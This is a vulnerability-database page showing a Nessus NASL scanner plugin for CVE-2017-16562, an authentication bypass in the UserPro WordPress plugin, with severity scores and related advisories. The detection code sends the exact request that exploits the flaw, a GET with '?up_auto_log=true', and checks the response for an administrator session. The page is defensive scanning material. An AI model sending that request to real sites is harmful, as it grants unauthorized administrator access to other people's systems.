Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2018-2024 and is owned by Tenable, Inc. or an Affiliate thereof.WORDPRESS_USERPRO_AUTH_BYPASS.NASL
HistoryJun 12, 2018 - 12:00 a.m.

UserPro Plugin for WordPress up_auto_log Parameter Remote Authentication Bypass

2018-06-1200:00:00
This script is Copyright (C) 2018-2024 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
110

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.785 High

EPSS

Percentile

98.3%

JSON

The UserPro Plugin for WordPress running on the remote web server is prior to version 4.9.17.1 It is, therefore, affected by a remote authentication bypass vulnerability. A remote, unauthenticated attacker can exploit this vulnerability, via a specially crafted request, to login as an administrator.

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(110482);
  script_version("1.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");

  script_cve_id("CVE-2017-16562");
  script_xref(name:"EDB-ID", value:"43117");

  script_name(english:"UserPro Plugin for WordPress up_auto_log Parameter Remote Authentication Bypass");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is running a PHP application that is affected
by a remote authentication bypass vulnerability.");
  script_set_attribute(attribute:"description", value:
"The UserPro Plugin for WordPress running on the remote web server
is prior to version 4.9.17.1 It is, therefore, affected by a remote
authentication bypass vulnerability. A remote, unauthenticated
attacker can exploit this vulnerability, via a specially crafted
request, to login as an administrator.");
  # https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?cad387dc");
  # https://packetstormsecurity.com/files/144905/WordPress-UserPro-4.6.17-Authentication-Bypass.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e5c0e4c4");
  script_set_attribute(attribute:"solution", value:
"Upgrade the UserPro Plugin for WordPress to version 4.9.17.1 or
later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-16562");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/11");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/10/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/12");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2018-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");
include("misc_func.inc");

app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];

#Check the plugin
plugin = "UserPro";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);
install_url = build_url(port:port, qs:dir);

if (!installed)
{
  path = "/wp-content/plugins/userpro/";

  checks = make_array();
  checks[path + "scripts/up-custom-script.js"][0] = make_list('userpro', 'css/userpro.min.css', 'jQuery');
  checks[path + "css/userpro.min.css"][0] = make_list('userpro-tip', 'userpro_connection');

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir : dir,
    port : port,
    ext : plugin
  );
}
if (!installed)
  audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");

# Exploit vulnerability
vuln_url = install_url + "?up_auto_log=true";

res = http_send_recv3(method:'GET', port:port, item:dir + "?up_auto_log=true",exit_on_fail:TRUE);

# These are the indicators that we logged in as an admin now
ptn_match = preg(multiline:TRUE, pattern:"<link rel='stylesheet'\s+id='admin-bar-css'.*<body class=.home blog\s+logged-in\s+admin-bar", string:res[2]);
if (ptn_match) #
{
  security_report_v4(
    port : port,
    generic : TRUE,
    request : make_list(vuln_url),
    severity : SECURITY_HOLE
  );
}
else
{
    audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, 'UserPro plugin');
}
VendorProductVersionCPE
wordpresswordpresscpe:/a:wordpress:wordpress

Related

wpexploit 1
cve 1
wpvulndb 1
nvd 1
cvelist 1
canvas 1
checkpoint_advisories 1
openvas 1
prion 1
wpexploit
wpexploit
UserPro <= 4.9.17 - Authentication Bypass
2017-11-10 00:00:00
cve
cve
CVE-2017-16562
2017-11-10 02:29:18
wpvulndb
wpvulndb
UserPro <= 4.9.17 - Authentication Bypass
2017-11-10 00:00:00
nvd
nvd
CVE-2017-16562
2017-11-10 02:29:18
cvelist
cvelist
CVE-2017-16562
2017-11-09 19:00:00
canvas
canvas
Immunity Canvas: WPUSERPRO_RCE
2017-11-10 02:29:00
checkpoint_advisories
checkpoint_advisories
WordPress Userpro Plugin Authentication Bypass (CVE-2017-16562)
2017-11-12 00:00:00
openvas
openvas
WordPress UserPro Plugin < 4.9.17.1 Authentication Bypass Vulnerability
2017-11-21 00:00:00
prion
prion
Authentication flaw
2017-11-10 02:29:00

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.785 High

EPSS

Percentile

98.3%

JSON
Related for WORDPRESS_USERPRO_AUTH_BYPASS.NASL
wpexploit1cve1wpvulndb1nvd1cvelist1canvas1checkpoint_advisories1openvas1prion1